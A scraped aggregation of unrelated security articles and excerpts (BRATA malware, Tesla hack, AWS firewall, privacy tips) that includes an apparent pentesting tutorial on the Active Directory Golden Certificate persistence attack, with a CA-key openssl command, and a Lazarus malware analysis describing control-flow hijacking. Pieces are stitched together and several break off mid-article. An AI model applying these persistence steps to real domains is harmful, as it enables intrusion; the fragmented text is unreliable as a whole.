From Drone to Counter-Drone: The Shifting Role of Cybersecurity

Cybertechnology has always been an issue in the drone industry, but its reach is expanding and evolving in multiple dimensions. Traditional cybersecurity concerns in the drone world referred either to the vulnerability of drone data and operations to cyberattacks, or the role that drones played in perpetrating cyberattacks themselves. 

Android Malware BRATA Wipes Your Device After Stealing Data

The Android malware known as BRATA has added new and dangerous features to its latest version, including GPS tracking, the capacity to use multiple communication channels, and a function that performs a factory reset on the device to wipe all traces of malicious activity. BleepingComputer reports: BRATA was first spotted by Kaspersky back in 2019 as an Android RAT (remote access tool) that mainly targeted Brazilian users. In December 2021, a report by Cleafy underscored the emergence of the malware in Europe, where it was seen targeting e-banking users and stealing their credentials with the involvement of fraudsters posing as bank customer support agents. Analysts at Cleafy continued to monitor BRATA for new features, and in a new report published today, illustrate how the malware continues to evolve.

The latest versions of the BRATA malware now target e-banking users in the UK, Poland, Italy, Spain, China, and Latin America. Each variant focuses on different banks with dedicated overlay sets, languages, and even different apps to target specific audiences. The authors use similar obfuscation techniques in all versions, such as wrapping the APK file into an encrypted JAR or DEX package. This obfuscation successfully bypasses antivirus detections […]. On that front, BRATA now actively seeks signs of AV presence on the device and attempts to delete the detected security tools before proceeding to the data exfiltration step.

Let’s make the teen Tesla hack a teachable moment

Assaf Harel leads the research and innovation activities at Karamba Security, where he oversees a broad IP portfolio of innovative products and services.

The buzz about 19-year-old Tesla hacker David Colombo is well deserved. A flaw in third-party software allowed him to remotely access 25 of the world’s leading EV manufacturer’s vehicles across 13 countries. The hacker shared that he was able to remotely unlock the doors, open the windows, blast music and start each vehicle.

How to deploy AWS Network Firewall to help protect your network from malware

Protecting your network and computers from security events requires multi-level strategies, and you can use network level traffic filtration as one level of defense. Users need access to the internet for business reasons, but they can inadvertently download malware, which can impact network and data security. This post describes how to use custom Suricata Rules with AWS Network Firewall to add protections that prevent users from downloading malware. You can use your own internal list, or a list from commercial or open-source threat intelligence feeds.

BattleBots: Behind The Scenes With Ghost Raptor

The ability to make decisions autonomously is not just what makes robots useful, it’s what makes robots robots. We value robots for their ability to sense what’s going on around them, make decisions based on that information, and then take useful actions without our input. In the past, robotic decision making followed highly structured rules—if you sense this, then do that. In structured environments like factories, this works well enough. But in chaotic, unfamiliar, or poorly defined settings, reliance on rules makes robots notoriously bad at dealing with anything that could not be precisely predicted and planned for in advance.

Five Data Privacy Tips for Consumers

As a consumer, you must assume that your personal information is not 100% safe online. Hackers cause data breaches every single day, exposing our email addresses, passwords, credit card numbers, social security numbers and other sensitive personal data in the process. Most people don’t think about how serious this is until they are affected personally through malicious activity, such as an attempted unauthorized purchase using their information. The disturbing fact is this type of crime is exploding, and according to one study there is a new victim of identity theft every 2 seconds in the United States alone. Experian reports that in 31% of data breaches, people later have their identity stolen. When you consider that in January 2021 alone, more than 870 million records were compromised, this is pretty alarming.

Messenger upgrades its end-to-end encrypted chat experience

Although default end-to-end encryption won’t fully arrive on Facebook Messenger until sometime in 2023, the company says today its feature offering end-to-end encrypted group chats and calls in Messenger is now fully rolled out. In addition, Messenger is adding another security feature with the launch of screenshot notifications in end-to-end encrypted chats, similar to rival Snapchat, that will alert you if someone snaps a photo from Messenger’s disappearing messages. Users will also now be able to add GIFs, stickers, and reactions to their encrypted chats, too.

Domain Persistence: Golden Certificate Attack

Introduction

Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an AD, uses ticket-based authentication where a Key Distribution Center (KDC) grants a Ticket-Granting Ticket (TGT) to a user requesting access to a service or an account which can then be redeemed to generate a service ticket (ST) to access a particular service, like SQL account. Attacks such as Golden Ticket demonstrate how an attacker can persist its access to the domain admin by obtaining the “krbtgt” account’s NTLM hash. Domain persistence is necessary for an analyst in the event the admin password gets changed. Persistence can also be achieved by using certificate-based authentication deployed in Active Directory Certificate Service. One such method is the Golden Certificate Attack. This technique leverages the certificate-based authentication in AD enabled by default with the installation of ADCS (Active Directory Certificate Services) by forging a new certificate using the private key of the CA certificate. The technique was implemented by Benjamin Delpy in Mimikatz. Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here.

Table of Content

  • ADCS and Certificate Basics
  • Installing ADCS in a local AD environment
  • Extracting CA certificate
  • Forging a new CA certificate
  • Obtaining domain admin’s TGT
  • Extracting admin NTLM hash
  • Performing PtH (Pass the Hash) attack

ADCS and Certificate Basics

ADCS provides authentication in a forest. It enhances the overall security identity of a member (user or service account) by binding it to a corresponding private key. A certificate is an X.509-formatted digitally signed document used for encryption, message signing, and/or authentication. It contains the following details:

  • Subject – The owner of the certificate.
  • Public Key – Associates the Subject with a private key stored separately.
  • NotBefore and NotAfter dates – Define the duration that the certificate is valid.
  • Serial Number – An identifier for the certificate assigned by the CA.
  • Issuer – Identifies who issued the certificate (commonly a CA).
  • SubjectAlternativeName – Defines one or more alternate names that the Subject may go by.
  • Basic Constraints – Identifies if the certificate is a CA or an end entity and if there are any constraints when using the certificate.
  • Extended Key Usages (EKUs) – Object identifiers (OIDs) that describe how the certificate will be used. Also known as Enhanced Key Usage in Microsoft parlance
  • Signature Algorithm – Specifies the algorithm used to sign the certificate.
  • Signature – The signature of the certificates body is made using the issuer’s (e.g., a CA’s) private key.

Certificate Authorities (CAs) are responsible for issuing certificates. Upon ADCS installation, CA first creates its own public-private key pair and signs its own root CA using its private key. Hosts add this root CA in their systems to build a trust system.

Certificate Enrollment – The process of a client obtaining a certificate from AD CS is called certificate enrolment in which the following steps happen:

  • Client generates public/private key pair
  • Client places a public key in a Certificate Signing Request which includes details like the subject of certificate and certificate template name.
  • Clients sign CSR using the private key and send CSR to the enterprise CA server.
  • CA server verifies the client’s requested certificate’s template
  • CA generates the certificate and signs it using its own private key

Types of extensions in certificates – Following extensions can be found throughout this article:

  • *.p12 – The PKCS#12 is a binary format for storing the server certificate, any intermediate certificates, and the private key into a single encryptable file. Whenever you export a certificate using msc it comes out in a p12 format.
  • *.pfx – It is the same as *.p12. *.pfx files are also PKCS#12 format binary certificates. The only difference is that *.pfx was developed by Microsoft and *.p12 by Netscape. So, for compatibility reasons you’ll see us converting *.p12 into *.pfx format.
  • *.pem – Contains Base64 encoded certificate+private key pair in this context. Otherwise, a pem file can have anything depending on the developer.

Installing ADCS in a local AD environment

To configure ADCS in our test environment, we followed the following steps.

Step 1: Go to server manager and choose “add roles and features

Step 2: You could read about pre-requisites that windows recommend and click next

Step 3: Choose the server from the server pool. Your environment could have multiple pools, we’ll choose DC1.ignite.local

Step 4: Under server roles, choose Active Directory Certificate Services and click next

Step 5: You can click next on this step or add some features. For this demo we don’t need anything extra so click next.

Step 6: Choose your role as the Certificate Authority. A CA is the primary signer of user certificates and allows them access to resources under certificate-based authentication schema.

Step 7:Click install

Step 8: Under the flags (notification) click configure Active Directory Certificate Services on the server

Step 9: Here, you can specify the Admin account you want to serve as your CA

Step 10: Choose CA (redundant step but click anyway)

Step 11: Choose enterprise CA

Step 12: Choose Root CA as domain admin is the one that is on the top of PKI structure

Step 13: Create a new private key. As explained above, a private key is required to sign any user certificate including the root CA. This key can be used to forge a golden certificate as will be explained later.

Step 14: You can modify as per your wish. We are leaving everything to the default settings.

Step 15: Here, you can add the common name for this CA certificate you installed

Extracting CA certificate

Forging a new CA certificate

"C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in ignite-DC1-CA.p12 -out newfile.pem

North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign

This blog was authored by Ankur Saini and Hossein Jazi

Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022.

In this campaign, Lazarus conducted spear phishing attacks weaponized with malicious documents that use their known job opportunities theme. We identified two decoy documents masquerading as American global security and aerospace giant Lockheed Martin.

In this blog post, we provide technical analysis of this latest attack including a clever use of Windows Update to execute the malicious payload and GitHub as a command and control server. We have reported the rogue GitHub account for harmful content.

Analysis

The two macro-embedded documents seem to be luring the targets about new job opportunities at Lockheed Martin:

  • Lockheed_Martin_JobOpportunities.docx
  • Salary_Lockheed_Martin_job_opportunities_confidential.doc

The compilation time for both of these documents is 2020-04-24, but we have enough indicators that confirm that they have been used in a campaign around late December 2021 and early 2022. Some of the indicators that shows this attack operated recently are the domains used by the threat actor.

Both of the documents use the same attack theme and have some common things like embedded macros but the full attack chain seems to be totally different. The analysis provided in the blog is mainly based on the “Lockheed_Martin_JobOpportunities.docx” document but we also provide brief analysis for the second document (Salary_Lockheed_Martin_job_opportunities_confidential.doc) at the end of this blog.

Attack Process

The below image shows the full attack process which we will discuss in detail in this article. The attack starts by executing the malicious macros that are embedded in the Word document. The malware performs a series of injections and achieves startup persistence in the target system. In the next section we will provide technical details about various stages of this attack and its payload capabilities.

Macros: Control flow hijacking through KernelCallbackTable

The above code uses a very unusual and lesser known technique to hijack the control flow and execute malicious code. The malware retrieves the address of the “WMIsAvailableOffline” function from “wmvcore.dll”, then it changes the memory protection permissions for code in “WMIsAvailableOffline” and proceeds to overwrite the code in memory with the malicious base64 decoded shell-code.

Another interesting thing happening in the above code is the control flow hijacking through the KernelCallbackTable member of the PEB. A call to NtQueryInformationProcess is made with ProcessBasicInformation class as the parameter which helps the malware to retrieve the address of PEB and thus retrieving the KernelCallbackTable pointer.

KernelCallbackTable is initialized to an array of callback functions when user32.dll is loaded into memory, which are used whenever a graphical call (GDI) is made by the process. To hijack the control flow, malware replaces the USER32!_fnDWORD callback in the table with the malicious WMIsAvailableOffline function. Once the flow is hijacked and malicious code is executed the rest of the code takes care of restoring the KernelCallbackTable to its original state.

Shellcode Analysis

The shellcode loaded by the macro contains an encrypted DLL which is decrypted at runtime and then manually mapped into memory by the shellcode. After mapping the DLL, the shellcode jumps to the entry point of that DLL. The shellcode uses some kind of custom hashing method to resolve the APIs. We used hollows_hunter to dump the DLL and reconstruct the IAT once it is fully mapped into memory.

The hashing function accepts two parameters: the hash of the DLL and the hash of the function we are looking for in that DLL. A very simple algorithm is used for hashing APIs. The following code block shows this algorithm:

def string_hashing(name): hash = 0 for i in range(0, len(name)): hash = 2 * (hash + (ord(name[i]) | 0x60)) return hash